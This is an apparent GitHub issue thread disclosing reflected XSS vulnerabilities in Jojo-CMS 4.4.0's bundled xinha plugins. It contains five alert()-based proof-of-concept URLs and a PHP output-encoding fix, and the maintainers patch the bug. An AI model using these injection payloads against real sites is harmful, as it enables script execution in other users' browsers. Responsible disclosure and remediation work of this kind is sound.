JojoCMS / Jojo-CMS

Jojo is an SEO-friendly, fast, and extensible PHP-based CMS
http://www.jojocms.org/
GNU Lesser General Public License v2.1

Jojo-CMS – Multiple Cross-Site Scripting (XSS) #29

Closed bestshow closed 7 years ago

bestshow commented 7 years ago

Product: Jojo-CMS
Download: http://www.jojocms.org/
Vulnerable Version: 4.4.0 and probably prior
Tested Version: 4.4.0
Author: ADLab of Venustech

Advisory Details: I have discovered multiple Cross-Site Scripting (XSS) vulnerabilities in Jojo-CMS, which can be exploited to execute arbitrary code. The vulnerabilities exist due to insufficient filtration of user-supplied data in multiple HTTP GET parameters passed to several pages. An attacker could execute arbitrary HTML and script code in the browser in the context of the vulnerable website. The exploitation examples below use the "alert()" JavaScript function to show a pop-up message box:

PoC:
(1) http://localhost/teststh4/Jojo-CMS-master/Jojo-CMS-master/plugins/jojo_core/external/xinha/plugins/ExtendedFileManager/editor.php?mode=x;%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E%3Cscript%3E
(2) http://localhost/teststh4/Jojo-CMS-master/Jojo-CMS-master/plugins/jojo_core/external/xinha/plugins/ExtendedFileManager/editorFrame.php?mode=x;%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E%3Cscript%3E
(3) http://localhost/teststh4/Jojo-CMS-master/Jojo-CMS-master/plugins/jojo_core/external/xinha/plugins/ExtendedFileManager/images.php?mode=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3C%22
(4) http://localhost/teststh4/Jojo-CMS-master/Jojo-CMS-master/plugins/jojo_core/external/xinha/plugins/ExtendedFileManager/manager.php?mode=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3C%22
(5) http://localhost/teststh4/Jojo-CMS-master/Jojo-CMS-master/plugins/jojo_core/external/xinha/plugins/SpellChecker/spell-check-savedicts.php?to_r_list=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3C%22
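As an added example, not code from Jojo-CMS or the bundled xinha plugins: the context-aware output encoding a maintainer would apply to a reflected GET parameter such as `mode`. It assumes the value is echoed into both an HTML attribute and an inline script string, which are the two contexts the payload shapes in the PoCs above are built for; the allow-list values are hypothetical.

```php
<?php
// Added example, not Jojo-CMS or xinha code. Assumes ?mode=... reaches
// two output contexts, an HTML attribute and an inline <script> string,
// as the two PoC payload shapes above target. Each needs its own encoding.
declare(strict_types=1);

// Vulnerable pattern: the raw GET value is concatenated into markup.
function render_unsafe(string $mode): string
{
    return '<input type="hidden" name="mode" value="' . $mode . '">'
         . '<script>var mode = "' . $mode . '";</script>';
}

// Hardened pattern: encode per output context.
function render_safe(string $mode): string
{
    // Attribute context: ENT_QUOTES encodes " and ' so the value cannot
    // close the attribute; ENT_SUBSTITUTE keeps invalid UTF-8 from emptying it.
    $attr = htmlspecialchars($mode, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');

    // Script context: a JSON string literal with <, >, &, ' and " written
    // as \uXXXX escapes, so "</script>" can never appear inside it.
    $flags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT
           | JSON_THROW_ON_ERROR;
    $js = json_encode($mode, $flags);

    return '<input type="hidden" name="mode" value="' . $attr . '">'
         . '<script>var mode = ' . $js . ';</script>';
}

// For a parameter with a small fixed vocabulary, allow-list it before
// rendering at all (the allowed values here are hypothetical).
function validate_mode(string $mode): string
{
    return in_array($mode, ['image', 'link'], true) ? $mode : 'image';
}

// Constructed inputs mirroring the two payload shapes in the report.
$samples = [
    'x;</script><script>alert(1);</script><script>',
    '"><script>alert(1);</script><"',
];
foreach ($samples as $s) {
    $out = render_safe($s);
    // Only the template's own </script> survives; the input's copies were escaped.
    assert(substr_count($out, '</script>') === 1);
    echo $out, PHP_EOL;
}
```

HTML-encoding alone (`htmlspecialchars`) is not sufficient for the script context, because `&lt;/script&gt;` is not what a browser's HTML tokenizer looks at inside a `<script>` element; the JSON escaping is what keeps the literal closing tag out of the page.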

frankblundt commented 7 years ago

CVE?

bestshow commented 7 years ago

Hi: CVE means “Common Vulnerabilities and Exposures”, and you can find more information on the website http://cve.mitre.org/ if you are interested. However, it does not matter; if you fix these vulnerabilities, I will request a CVE myself. Thanks.

Sincerely

bestshow commented 7 years ago

Is there anyone who can handle this issue?

frankblundt commented 7 years ago

I’m sure someone will look at it eventually. It’s not really a priority at the moment.

Thank you for finding it and posting it though :)

On 23/02/2017, at 5:58 AM, bestshow notifications@github.com wrote:

Is there anyone who can handle this issue?


antonyspalding commented 7 years ago

Hi, We have just put up a patch that should fix this issue.

Please test and let us know if it covers all your concerns.

antonyspalding commented 7 years ago

Hi Bestshow, We have now patched the spellchecker plugin as well.

Do these changes address your concerns?

cheers, Antony

bestshow commented 7 years ago

@antonyspalding Yes, the patch addresses the issue, thanks.